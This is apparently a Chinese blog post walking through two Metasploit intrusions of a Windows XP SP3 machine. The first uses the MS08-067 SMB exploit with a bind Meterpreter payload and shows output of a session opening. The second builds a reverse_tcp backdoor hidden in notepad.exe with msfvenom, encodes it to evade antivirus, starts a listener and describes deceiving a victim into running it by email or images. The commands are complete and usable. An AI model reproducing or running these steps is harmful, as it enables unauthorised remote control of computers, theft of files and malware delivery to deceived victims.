演示使用Metasploit入侵Windows
2024-08-24 16:44:02
我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。
本文演示怎么使用Metasploit入侵windows xp sp3。
启动msfconsole:
# msfconsole
选择一个漏洞:
msf > search platform: windows xp sp3
exploit/windows/smb/ms08_067_netapi是08年发现的漏洞,等级Great。
查看某个漏洞的详细信息;包含使用方法、支持的平台等等,非常有帮助:
msf > info exploit/windows/smb/ms08_067_netapi
依次执行如下命令:
msf > use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/bind_tcp
> set RHOST 192.168.0.108 (设置目标主机IP地址)
> exploit
如果目标主机有这个漏洞的话,你就可以控制它了;如果没有,尝试使用其他漏洞。
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese
[*] Selected Target: Windows XP SP3 Chinese (AlwaysOn NK)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (751104 bytes) to 192.168.0.108
[*] Meterpreter session 1 opened (192.168.0.1:41614 -> 192.168.0.108:4444) at 2016-04-15 17:29:32
meterpreter >
现在你就可以控制目标主机了,可以截屏、录音、视频、下载文件、杀进程等等;使用help查看可以执行的命令。
演示使用后门程序侵入Windows
原理:在Kali Linux上生成后门程序,然后把它发送给受害者,欺骗受害者运行(使用邮件、图片等等)。难点是需要过杀毒软件和防火墙。
生成后门程序:
我把后门程序隐藏到记事本程序中:notepad.exe
查看Kali Linux的IP:ifconfig(192.168.0.112)
创建后门程序,my_backdoor.exe:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4445 -x NOTEPAD.EXE -e x86/jmp_call_additive -i 4 -k -f exe > my_backdoor.exe
上面命令使用加密试图躲过杀毒软件,但是,不要期望它可以生效。使用man msfvenom查看帮助。
把它发送到Windows系统,并运行;如果不能运行换用其他加密方式。
启动msfconsole:
# msfconsole
use exploit/multi/handler
set LHOST 192.168.0.112
set LPORT 4445
set payload windows/meterpreter/reverse_tcp
show options
exploit
等待受害者启动后门程序。
OK,入侵成功。
最新文章
- 编译安装mmseg提示cannot find input file: src/Makefile.in错误
- RSA+DES动态加密
- 《C与指针》第十三章练习
- Hadoop SPARK 环境搭建
- 简单总结一下NotificationCenter、KVC、KVO、Delegate
- java poi 导出excel
- nginx源代码分析--模块分类
- Struts2---OGNL表达式和EL表达式
- qt 文本中显示中文
- Linux简介,虚拟机安装,网络设置,桌面和vim安装
- PHP 个人用到的琐碎代码记录
- kubernetes实践之运行aspnetcore webapi微服务
- 【手记】走近科学之为什么明明实现了IEnumerable<;T>;的类型却不能调用LINQ扩展方法
- 关于【jq插件开发】
- 2019-2-21.NET中异常类(Exception)
- laravle 整合 thrift
- 移动端html的overflow:hidden属性失效问题
- declare -A color
- 【设计模式】—— 组合模式Composite
- 【异常】Caused by: java.lang.NoClassDefFoundError: org/aspectj/lang/annotation/Around
热门文章
- Mac下 javac java 进行编译和运行含有包路径及引入jar包的类
- js踩过的一些坑
- Linux 初始化之 Systemd机制
- Mybatis${}、#{}及使用#{}时指定jdbcType
- linux根分区满了如何处理,查找大文件方法
- android timed gpio (linux 3.0.0) 受时钟控制的gpio【转】
- SpringBoot 密码MD5加密
- Flume-NG源码阅读之FileChannel
- Java中foreach用法,增强型的for循环的样例和解释
- 用Heartbeat实现HA集群